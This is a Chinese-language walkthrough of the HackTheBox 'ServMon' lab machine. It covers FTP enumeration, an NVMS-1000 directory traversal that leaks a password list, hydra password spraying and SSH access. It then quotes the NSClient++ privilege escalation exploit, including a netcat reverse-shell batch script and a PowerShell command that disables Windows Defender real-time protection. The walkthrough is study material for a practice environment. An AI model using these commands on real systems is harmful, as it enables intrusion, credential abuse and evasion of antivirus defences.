No.2--HackTheBox--ServMon

HackTheBox-ServMon

Windows
难度：eazy
[https://app.hackthebox.com/machines/ServMon]

---

ServMon是一台简单的Windows机器，其特点是HTTP服务器托管一个NVMS-1000（网络监视管理软件）实例。人们发现这很容易受到LFI的攻击，LFI用于读取用户桌面上的密码列表。使用凭据，我们可以作为第二个用户SSH到服务器。作为这个低权限用户，可以枚举系统并找到‘ NSClient ’（一个系统监视代理）的密码。创建SSH隧道后，我们可以访问NSClient web应用程序。该应用程序包含创建可在“NT AUTHORITY\SYSTEM”上下文中执行的脚本的功能。用户被赋予重新启动“NSCP”服务的权限，在创建恶意脚本后，该服务被重新启动，并以SYSTEM的身份执行命令。

---

footstep

1.namp扫描

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.246.65      
Nmap scan report for 10.129.246.65
Host is up (0.50s latency).
Not shown: 991 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5666/tcp open  nrpe
6699/tcp open  napster
8443/tcp open  https-alt

Nmap done: 1 IP address (1 host up) scanned in 72.91 seconds

首先尝试80端口发现是一个管理界面的入口，但是没有密码，继续尝试登录ftp，使用anonymous可以登录，在ftp服务器中发现两个有用的文件

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.246.65
Connected to 10.129.246.65.
220 Microsoft FTP Service
Name (10.129.246.65:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49686|)
150 Opening ASCII mode data connection.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> ls /Users/Nathan
229 Entering Extended Passive Mode (|||49688|)
150 Opening ASCII mode data connection.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.

使用get命令下载后可以看到

┌──(kali㉿kali)-[~]
└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine 

可以发现Nadine的桌面上有一个Passwords.txt文件，以及一个线索：撤销对 NVMS 的公共访问权限（未完成）

┌──(kali㉿kali)-[~]
└─$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint                                                                                                   

通过刚才对80端口的访问，可以看到运行的服务是NVSM-1000，使用exploit-db搜索，找到一个可利用漏洞[TVT NVMS 1000 - Directory Traversal][https://www.exploit-db.com/exploits/48311]，使用burpsuite的reapeater功能对漏洞进行利用，再根据刚才的线索来定位密码

获取密码，并保存到文件备用

┌──(kali㉿kali)-[~]
└─$ cat password.txt     
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

保存已知的用户名

┌──(kali㉿kali)-[~]
└─$ cat usernames.txt
Nadine
Nathan
administrator

密码喷洒攻击

hydra -U usernames.txt -P password.txt ssh:[target_ip]

获取登录用户名密码

username:nadine
password:L1k3B1gBut7s@W0rk

通过ssh登录后在Program FIles文件夹发现一个非默认应用程序:NSClient++

PS C:\Users\Nadine\Desktop> cd 'C:\Program Files\' 
PS C:\Program Files> ls 


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/1/2022   1:20 AM                Common Files
d-----       11/11/2019   6:52 PM                internet explorer
d-----        2/28/2022   6:07 PM                MSBuild
d-----        2/28/2022   6:55 PM                NSClient++
d-----        2/28/2022   6:46 PM                NVMS-1000
d-----        2/28/2022   6:32 PM                OpenSSH-Win64
d-----        2/28/2022   6:07 PM                Reference Assemblies
d-----        2/28/2022   5:44 PM                VMware
d-r---       11/11/2019   6:52 PM                Windows Defender
d-----       11/11/2019   6:52 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----       11/11/2019   6:52 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----       11/11/2019   6:52 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        2/28/2022   6:25 PM                WindowsPowerShell

在exploit-db中搜索NSClinet++，得到一个可利用的提权漏洞[NSClient++ 0.5.2.35 - Privilege Escalation][https://www.exploit-db.com/exploits/46802]，

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.  

The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.  

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
	C:\Program Files\NSClient++>nscp web -- password --display
	Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
	@echo off
	c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
	nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
	nc -nlvvp 443
	listening on [any] 443 ...
	connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
	Microsoft Windows [Version 10.0.17134.753]
	(c) 2018 Microsoft Corporation. All rights reserved.

	C:\Program Files\NSClient++>whoami
	whoami
	nt authority\system
	
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System

---

根据漏洞利用步骤，我们逐步进行提权操作：

1.在c:\program files\nsclient++\nsclient.ini获取密码：ew2x6SsGTxjRwXOT
2.登录管理界面，激活CheckExternalScripts和Scheduler
3.从攻击机下载nc.exe和反向shell脚本evil.bat

@echo off
	c:\temp\nc.exe [your-ip] [your-port] -e cmd.exe

4.开启监听

nc -nlvvp [your-port]

5.在管理界面添加evil.bat为foobar

Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat

6.在管理界面添加脚本自动启动

- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

重启系统并等待反向连接，由于NSClient++的配置修改后需要重启才能生效，重启系统

---

下面我们逐步操作：
根据前面的扫描结果，在8843端口上还运行了一个http服务，再对8443端口进行扫描，很遗憾没有获得版本信息。

假设NSClient++服务运行在8443端口。无法直接访问8443端口，但可以访问ssh端口，则可以通过本地端口转发的方式来访问8443端口

ssh -L 8443:loaclhost:8443 nadine@[target-ip]

使用浏览器尝试访问localhost:8443端口，经过漫长的等待，进入到NSClient++管理界面，使用前面找到的密码登录，并逐步完成刚才的漏洞利用。
在上传nc.exe的时候遇到了一个问题，nc.exe会被系统直接删掉，这是由于Windows Defender的实时监控功能，需要手动关闭这一功能，尝试

powershell Set-MpPreference -DisableRealtimeMonitoring $true

发现没有权限，需要NT AUTHORITY\SYSTEM 或管理员权限执行。
将禁用实时监控的命令保存为 poiint.bat 脚本，并通过NSClient++的脚本功能来调用，借助NSClient++ 以 SYSTEM 权限执行 poiint.bat，从而成功禁用实时保护。

添加后reload

导航到设置->外部脚本->脚本


点击run，禁用掉AV实时监控

接下来备份一下poiint.bat然后直接把反向shell的脚本重命名为poiint.bat来执行

PS C:\Temp> mkdir backup


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/17/2023   4:15 AM                backup


PS C:\Temp> move .\poiint.bat .\backup\
PS C:\Temp> ls


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/17/2023   4:15 AM                backup
-a----       12/17/2023   3:59 AM             52 evil.bat
-a----       12/17/2023   3:58 AM          59392 nc.exe


PS C:\Temp> move .\evil.bat poiint.bat
PS C:\Temp> ls


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/17/2023   4:15 AM                backup
-a----       12/17/2023   3:58 AM          59392 nc.exe
-a----       12/17/2023   3:59 AM             52 poiint.bat

开启监听，

nc -lvnp [your-port]

得到反向shell！
找到flag！